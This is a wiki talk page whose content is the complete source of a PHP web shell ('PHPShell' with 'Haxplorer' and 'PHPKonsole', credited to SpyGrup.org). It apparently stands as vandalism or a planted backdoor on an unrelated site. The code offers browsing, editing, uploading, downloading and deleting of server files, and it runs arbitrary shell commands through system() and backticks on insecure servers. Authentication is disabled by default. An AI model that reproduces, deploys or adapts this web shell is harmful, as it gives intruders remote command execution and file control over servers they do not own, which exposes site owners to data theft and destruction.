Talk:Main Page

From Contrexx Wiki (English)

<?php

PHPSHELL.PHP By Kruis & YaduriS August 28th 2003 *
*
Welcome to YaduriS PHPShell script... *
This script will allow you to browse webservers etc... *
Just copy the file to your directory and open it in your Internet Browser. *
*
The webserver should support PHP... *
*
You can modify the script if you want, but please send me a copy to: *
admin@spygrup.org[Kruis] - yaduris@spygrup.org[YaduriS] *

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !! PLEASE NOTE: You should use this script at own risk, it should do damage to the !! !! Sites or even the server... You are responsible for your own deeds. !! !! The admin of your webserver should always know you are using this !! !! script. !! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

/*Setting some envirionment variables...*/

/* I added this to ensure the script will run correctly...

  Please enter the Script's filename in this variable. */

$SFileName=$PHP_SELF;

/* uncomment the two following variables if you want to use http

  authentication. This will password protect your PHPShell */

//$http_auth_user = "phpshell"; /* HTTP Authorisation username, uncomment if you want to use this */ //$http_auth_pass = "phpshell"; /* HTTP Authorisation password, uncomment if you want to use this */

error_reporting(0); $PHPVer=phpversion(); $isGoodver=(intval($PHPVer[0])>=4); $scriptTitle = "PHPShell"; $scriptident = "$scriptTitle by SpyGrup.Org";

$urlAdd = ""; $formAdd = "";

function walkArray($array){

 while (list($key, $data) = each($array))
   if (is_array($data)) { walkArray($data); }
   else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}

}

if (isset($_PUT)) walkArray($_PUT); if (isset($_GET)) walkArray($_GET); if (isset($_POST)) walkArray($_POST);

$pos = strpos($urlAdd, "s=r"); if (strval($pos) != "") { $urlAdd= substr($urlAdd, 0, $pos); }

$urlAdd .= "&s=r&";

if (empty($Pmax))

   $Pmax = 125;   /* Identifies the max amount of Directories and files listed on one page */

if (empty($Pidx))

   $Pidx = 0;

$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));

$scriptdate = "August 28th 2003"; $scriptver = "Version 2.6.6dev"; $LOCAL_IMAGE_DIR = "img"; $REMOTE_IMAGE_URL = "img"; $img = array(

               "Edit"         => "edit.gif",
               "Download"     => "download.gif",
               "Upload"     => "upload.gif",
               "Delete"     => "delete.gif",
               "View"         => "view.gif",
               "Rename"     => "rename.gif",
               "Move"         => "move.gif",
               "Copy"         => "copy.gif",
               "Execute"     => "exec.gif"
           );

while (list($id, $im)=each($img))

   if (file_exists("$LOCAL_IMAGE_DIR/$im"))
       $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
   else
        $img[$id] = "[$id]";

/* HTTP AUTHENTICATION */

   if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass)  ||  (($logoff==1) && $noauth=="yes")  )   { 
       setcookie("noauth","");
       Header( "WWW-authenticate:  Basic realm=\"$scriptTitle $scriptver\"");
       Header( "HTTP/1.0  401  Unauthorized");
       echo "Your username or password is incorrect";
       exit ;
                
   }

function buildUrl($display, $url) {

       global $urlAdd;
       $url = $SFileName . "?$urlAdd$url";
   return "<a href=\"$url\">$display</a>";

}

function sp($mp) {

   for ( $i = 0; $i < $mp; $i++ )
       $ret .= " ";
   return $ret;

}

function spacetonbsp($instr) { return str_replace(" ", " ", $instr); }

function Mydeldir($Fdir) {

   if (is_dir($Fdir)) {
       $Fh=@opendir($Fdir);
        while ($Fbuf = readdir($Fh))
            if (($Fbuf != ".") && ($Fbuf != ".."))
               Mydeldir("$Fdir/$Fbuf");
       @closedir($Fh);
               return rmdir($Fdir);
   }    else {
       return unlink($Fdir);
   }

}

function arrval ($array) { list($key, $data) = $array; return $data; }

function formatsize($insize) {

   $size = $insize;
   $add = "B";
   if ($size > 1024) {
        $size = intval(intval($size) / 1.024)/1000;
        $add = "KB";
    }
    if ($size > 1024) {
        $size = intval(intval($size) / 1.024)/1000;
        $add = "MB";
    }
    if ($size > 1024) {
        $size = intval(intval($size) / 1.024)/1000;
        $add = "GB";
    }
    if ($size > 1024) {
        $size = intval(intval($size) / 1.024)/1000;
        $add = "TB";
    }
    return "$size $add";

}

if ($cmd != "downl") {

?>

<HTML>

<HEAD>
 <STYLE>
 </STYLE>
 <TITLE><?php echo $SFileName ?></TITLE>
</HEAD>
<body topmargin="0" leftmargin="0">

       
        <?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>

   <?php

}

if ( $cmd=="dir" ) {

     $h=@opendir($dir);
    if ($h == false) {
         echo "
".sp(3)."\n\n\n\n
               COULD NOT OPEN THIS DIRECTORY!!!
".sp(3)."\n
               THE SCRIPT WILL RESULT IN AN ERROR!!!
               

".sp(3)."\n
               PLEASE MAKE SURE YOU'VE GOT READ PERMISSIONS TO THE DIR...
               

\n\n\n\n";
    }
       if (function_exists('realpath')) {
       $partdir = realpath($dir);
   }
       else {
       $partdir = $dir;
   }
    if (strlen($partdir) >= 100) {
        $partdir = substr($partdir, -100);
        $pos = strpos($partdir, "/");
        if (strval($pos) != "") {
            $partdir = "<--   ...".substr($partdir, $pos);
        }
       $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
       $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); 
   $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
    }
   ?>
     <form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">

HAXPLORER - Server Files Browser...

            Browsing:

<a href="javascript: urlform.submit();">GO<b></a> <center></td>
</tr> </table> </td> </tr> </table>
<?php /* */ /* */ echo "\n";
/* */
echo "\n";
/* */
echo "\n";
/* */
echo "

Filename

Actions (Attempt to perform)

Size

Attributes

Modification Date

".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)." ".sp(2)."\n";
/* */ if ( ($file != ".") && ($file != "..") ) echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; /* */ if ( ($file != ".") && ($file != "..") ) echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; /* */
echo "     \n";
echo "D"; if ( @is_readable("$dir/$file") ) { echo "R"; } if (function_exists('is_writeable')) { if ( @is_writeable("$dir/$file") ) { echo "W</stong>"; } } else { echo "<strong>(W)</stong>"; } if ( @is_executable("$dir/$file") ) { echo "<Strong>X<strong>"; } echo "  </td>\n"; /* */
echo " \n";
echo "  ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."  "; echo "</td>"; echo "</tr>\n";

} else { /* */ /* */ if ( @is_readable("$dir/$file") )
echo "
".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n";
else
echo "
".sp(3).$file.sp(9)."</td>\n";
/* */
echo "   \n";
/* */ echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; /* */ if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n"; /* */ echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n"; /* */ if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n"; /* */ echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; /* */ echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n"; /* */ if ( @is_executable("$dir/$file") ) echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n"; /* */
echo sp(2)."</td>\n";
/* */
echo " \n";
$size = @filesize("$dir/$file"); If ($size != false) { $filesizes += $size; echo "  <strong>".formatsize($size)."<strong>"; } else echo "  <strong>0 B<strong>"; echo "  </td>\n";

/* */
echo "   \n";
if ( @is_readable("$dir/$file") ) echo "<strong>R"; if ( @is_writeable("$dir/$file") ) echo "W</stong>"; if ( @is_executable("$dir/$file") ) echo "<Strong>X<strong>"; if (function_exists('is_uploaded_file')){ if ( @is_uploaded_file("$dir/$file") ) echo "<Strong>U<strong>"; } else { echo "<Strong>(U)<strong>"; } echo "  </td>\n"; /* */
echo " \n";
echo "  ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."  "; echo "</td>"; echo "</tr>\n"; } }
echo "</table>\n\n";
function printpagelink($a, $b, $link = ""){ if ($link != "") echo "<A HREF=\"$link\">| $a - $b |</A>"; else echo "| $a - $b |"; } if ( count($filelist)-1 > $Pmax ) {
echo "";
}

echo "
\n";
echo "  ".@count ($dirn)." Dir(s), ".@count ($filen)." File(s)  \n";
echo " \n"; echo "  Total filesize: ".formatsize($filesizes)."
Page: ";
$Fi = 0; while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) { $from = $Fi*$Pmax; while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; $to = ($Fi + 1) * $Pmax - 1; if ($Fi == $Pidx) $link=""; else $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); echo "   "; $Fi++; } $from = $Fi*$Pmax; while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; $to = count($filelist)-1; if ($Fi == $Pidx) $link=""; else $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
echo "

\n
";
if ($isGoodver) {
echo "\n";
} else {
echo "\n";
} /* */
echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "
Server's PHP Version:    $PHPVer
Server's PHP Version:    $PHPVer (Some functions might be unavailable...)
Other actions:    ".buildUrl( "| New File |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
buildUrl( "| New Directory |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
buildUrl( "| Upload a File |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "\n
Script Location:    $PATH_TRANSLATED
Your IP:    $REMOTE_ADDR
Browsing Directory:   $partdir
Legend:  </strong </td> \n"; echo ""; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "
D:   Directory.
R:   Readable.
W:   Writeable.
X:   Executable.
U:   HTTP Uploaded File.
</td>";
echo "</table>"; echo "
"; @closedir($h); } elseif ( $cmd=="execute" ) {/**/ echo system("$file"); }

elseif ( $cmd=="deldir" ) { /* */
echo "</center>"; } elseif ( $cmd=="delfile" ) { /* */ echo "
" ;
if ($auth == "yes") { if (Mydeldir($file)==false) { echo "Could not remove \"$file\"
Permission denied, or directory not empty..."; } else { echo "Successfully removed \"$file\"
"; } echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>"; } else { echo "Are you sure you want to delete \"$file\" and all it's subdirectories ? <form action=\"$SFileName?$urlAdd\" method=\"POST\"> <input type=\"hidden\" name=\"cmd\" value=\"deldir\"> <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\"> <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\"> <input type=\"hidden\" name=\"file\" value=\"$file\"> <input type=\"hidden\" name=\"auth\" value=\"yes\"> <input type=\"submit\" value=\"Yes\"></form> <form action=\"$SFileName?$urlAdd\" method=\"POST\"> <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> <input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>"; }
echo "
</center>"; } elseif ( $cmd=="newfile" ) { /* */ echo "
" ;
if ($auth == "yes") { if (@unlink($file)==false) { echo "Could not remove \"$file\"
"; } else { echo "Successfully removed \"$file\"
"; } echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>"; } else { echo "Are you sure you want to delete \"$file\" ? <form action=\"$SFileName?$urlAdd\" method=\"POST\"> <input type=\"hidden\" name=\"cmd\" value=\"delfile\"> <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\"> <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\"> <input type=\"hidden\" name=\"file\" value=\"$file\"> <input type=\"hidden\" name=\"auth\" value=\"yes\">

<input type=\"submit\" value=\"Yes\"></form> <form action=\"$SFileName?$urlAdd\" method=\"POST\"> <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> <input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>"; }
echo "
</table></center> "; } elseif ( $cmd=="newdir" ) { /* */ echo "
";
$i = 1; while (file_exists("$lastdir/newfile$i.txt")) $i++; $file = fopen("$lastdir/newfile$i.txt", "w+"); if ($file == false) echo "Could not create the new file...
"; else echo "Successfully created: \"$lastdir/newfile$i.txt\"
"; echo " <form action=\"$SFileName?$urlAdd\" method=\"POST\"> <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> <input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> <input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"> </form></center>

</table></center>"; } elseif ( $cmd=="edit" ) { /* */ $contents = ""; $fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) { $contents .= htmlentities( $line ) ; } echo "
" ;
$i = 1; while (is_dir("$lastdir/newdir$i")) $i++; $file = mkdir("$lastdir/newdir$i", 0777); if ($file == false) echo "Could not create the new directory...
"; else echo "Successfully created: \"$lastdir/newdir$i\"
"; echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"> <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> <input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> <input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\">
</form></center>
";
echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n"; echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n"; echo "EDIT FILE: $file
\n"; echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea>
\n"; echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n"; echo "<input type=\"submit\" value=\"Save\">"; echo "</form>";
echo "
";
} elseif ( $cmd=="saveedit" ) { /* */

$fo = fopen($file, "w"); $wrret = fwrite($fo, stripslashes($contents)); $clret = fclose($fo);

} elseif ( $cmd=="downl" ) { /* */

$downloadfile = urldecode($file); if (function_exists("basename")) $downloadto = basename ($downloadfile); else $downloadto = "download.ext"; if (!file_exists("$downloadfile")) echo "The file does not exist"; else { $size = @filesize("$downloadfile"); if ($size != false) { $add="; size=$size"; } else { $add=""; } header("Content-Type: application/download"); header("Content-Disposition: attachment; filename=$downloadto$add"); $fp=fopen("$downloadfile" ,"rb"); fpassthru($fp); flush(); }

} elseif ( $cmd=="upload" ) { /* */

?>

Welcome to the upload section... Please note that the destination file will be
overwritten if it already exists!!!

<form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post"> <input type="hidden" name="MAX_FILE_SIZE" value="1099511627776"> <input type="hidden" name="cmd" value="uploadproc"> <input type="hidden" name="dir" value="<?php echo $dir ?>"> <input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>"> <input type="hidden" name="lastdir" value="<?php echo $lastdir ?>"> Select local file:
<input size="75" name="userfile" type="file">
<input type="submit" value="Send File"> </form>
<form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST"> <input type="hidden" name="cmd" value="<?php echo $lastcmd ?>"> <input type="hidden" name="dir" value="<?php echo $lastdir ?>"> <input tabindex="0" type="submit" value="Cancel"> </form>

<?php

} elseif ( $cmd=="uploadproc" ) { /* */
echo "</table></center>"; } elseif ( $cmd=="file" ) { /* */ echo "
";
$fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) { echo spacetonbsp(@htmlentities($line))."
\n"; }
echo "
";
} elseif ( $cmd=="ren" ) { /* */
if (function_exists('is_dir')) { if (is_dir("$oldfile")) { $objname = "Directory"; $objident = "Directory"; } else { $objname = "Filename"; $objident = "file"; } }
echo "
";
if (file_exists($userfile)) $res = copy($userfile, "$dir/$userfile_name"); echo "Uploaded \"$userfile_name\" to \"$userfile\";
\n"; if ($res) { echo "Successfully moved \"$userfile\" to \"$dir/$userfile_name\".\n

"; echo "Local filename: \"$userfile_name\".\n
Remote filename: \"$userfile\".\n
"; echo "Filesize: ".formatsize($userfile_size).".\n
Filetype: $userfile_type.\n
"; } else { echo "Could not move uploaded file; Action aborted..."; } echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ;
echo "

Rename a file:

\n";
If (empty($newfile) != true) {
echo "";
$return = @rename($oldfile, "$olddir$newfile"); if ($return) { echo "$objident renamed successfully:

Old $objname: \"$oldfile\".
New $objname: \"$olddir$newfile\""; } else { if ( @file_exists("$olddir$newfile") ) { echo "Error: The $objident does already exist...

\"$olddir$newfile\"

Hit your browser's back to try again..."; } else { echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it."; } }
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>" ;
} else { $dpos = strrpos($oldfile, "/"); if (strval($dpos)!="") { $olddir = substr($oldfile, 0, $dpos+1); } else { $olddir = "$lastdir/"; } $fpos = strrpos($oldfile, "/"); if (strval($fpos)!="") { $inputfile = substr($oldfile, $fpos+1); } else { $inputfile = ""; }
echo "
<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n"; echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n"; echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n"; echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n"; echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n"; echo "Rename \"$oldfile\" to:
\n"; echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\">
<input type=\"submit\" value=\"Rename\">"; echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
echo "
";
}

} else if ( $cmd == "con") {
?>

[edit] PHPKonsole

<?php
if (ini_get('register_globals') != '1') {

if (!empty($HTTP_POST_VARS)) extract($HTTP_POST_VARS); if (!empty($HTTP_GET_VARS)) extract($HTTP_GET_VARS); if (!empty($HTTP_SERVER_VARS)) extract($HTTP_SERVER_VARS); } if (!empty($work_dir)) { if (!empty($command)) { if (ereg('^blank:*cdblank:+([^;]+)$', $command, $regs)) { if ($regs[1][0] == '/') { $new_dir = $regs[1]; } else { $new_dir = $work_dir . '/' . $regs[1]; } if (file_exists($new_dir) && is_dir($new_dir)) { $work_dir = $new_dir; } unset($command); } } } if (file_exists($work_dir) && is_dir($work_dir)) { chdir($work_dir); } $work_dir = exec('pwd');

?>

<form name="myform" action="<?php echo "$PHP_SELF?$urlAdd" ?>" method="post">

Current working directory:
<input type="hidden" name="cmd" value="con"> <?php $work_dir_splitted = explode('/', substr($work_dir, 1)); printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=/">Root</a>/', $PHP_SELF, $stderr); if (!empty($work_dir_splitted[0])) { $path = ; for ($i = 0; $i < count($work_dir_splitted); $i++) { $path .= '/' . $work_dir_splitted[$i]; printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=%s">%s</a>/', $PHP_SELF, $stderr, urlencode($path), $work_dir_splitted[$i]); } }
?> Choose new working directory: <select class="inputtext" name="work_dir" onChange="this.form.submit()">
<?php $dir_handle = opendir($work_dir); while ($dir = readdir($dir_handle)) { if (is_dir($dir)) { if ($dir == '.') { echo "<option value=\"$work_dir\" selected>Current Directory</option>\n"; } elseif ($dir == '..') { if (strlen($work_dir) == 1) { } elseif (strrpos($work_dir, '/') == 0) { echo "<option value=\"/\">Parent Directory</option>\n"; } else { echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n"; } } else { if ($work_dir == '/') { echo "<option value=\"$work_dir$dir\">$dir</option>\n"; } else { echo "<option value=\"$work_dir/$dir\">$dir</option>\n"; } } } } closedir($dir_handle); ?>
</select>

Command: <input class="inputtext" type="text" name="command" size="60"> <input name="submit_btn" class="inputbutton" type="submit" value="Execute Command">

Enable stderr-trapping? <input type="checkbox" name="stderr"<?php if (($stderr) || (!isset($stderr)) ) echo " CHECKED"; ?>>

<textarea cols="80" rows="19" class="inputtextarea" wrap=off readonly><?php if (!empty($command)) { echo "phpKonsole> ". htmlspecialchars($command) . "\n\n"; if ($stderr) { $tmpfile = tempnam('/tmp', 'phpshell'); $command .= " 1> $tmpfile 2>&1; " . "cat $tmpfile; rm $tmpfile"; } else if ($command == 'ls') { $command .= ' -F'; } $output = `$command`; echo htmlspecialchars($output); } ?></textarea> </form> <script language="JavaScript" type="text/javascript"> document.forms[0].command.focus(); </script>

<?php } else { /* */

$isMainMenu = true; ?>

-<[{ <?php echo $scriptTitle ?> Main Menu }]>-

<center>

<?php echo buildUrl( sp(2)."==> Haxplorer <==", "cmd=dir&dir=.").sp(2); ?>

Haxplorer is a server side file browser wich (ab)uses the directory object to list the files and directories stored on a webserver. This handy tools allows you to manage files and directories on a unsecure server with php support.

This entire script is coded for unsecure servers, if your server is secured the script will hide commands or will even return errors to your browser...

<?php echo buildUrl( sp(2)."==> PHPKonsole <==", "cmd=con").sp(2); ?>

PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver. When you run commands they will run as the webservers UserID. This should work perfectly for managing files, like moving, copying etc. If you're using a linux server, system commands such as ls, mv and cp will be available for you...

This function will only work if the server supports php and the execute commands...

<?php

}
if ($cmd != "downl") {

if ( $isMainMenu != true) { ?>

  <?php echo buildUrl("[ Main Menu ] ", "cmd=&dir="); ?>     <?php echo buildUrl("[ PHPKonsole ] ", "cmd=con"); ?>     <?php echo buildUrl("[ Haxplorer ] ", "cmd=dir&dir=."); ?>

<?php

}

?>

<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>

</td> </tr> </table>

<?php }

?>

Retrieved from "http://www.contrexx.com/wiki/index.php/Talk:Main_Page"

Views

Article

Discussion

Edit

+

History

Personal tools

Log in / create account

Navigation

Main Page

Community portal

Current events

Recent changes

Random page

Help

Donations

Search

Toolbox

What links here

Related changes

Special pages

Printable version

Permanent link

This page was last modified 16:08, 15 February 2010.

This page has been accessed 83 times.

Privacy policy

About Contrexx Wiki (English)

Disclaimers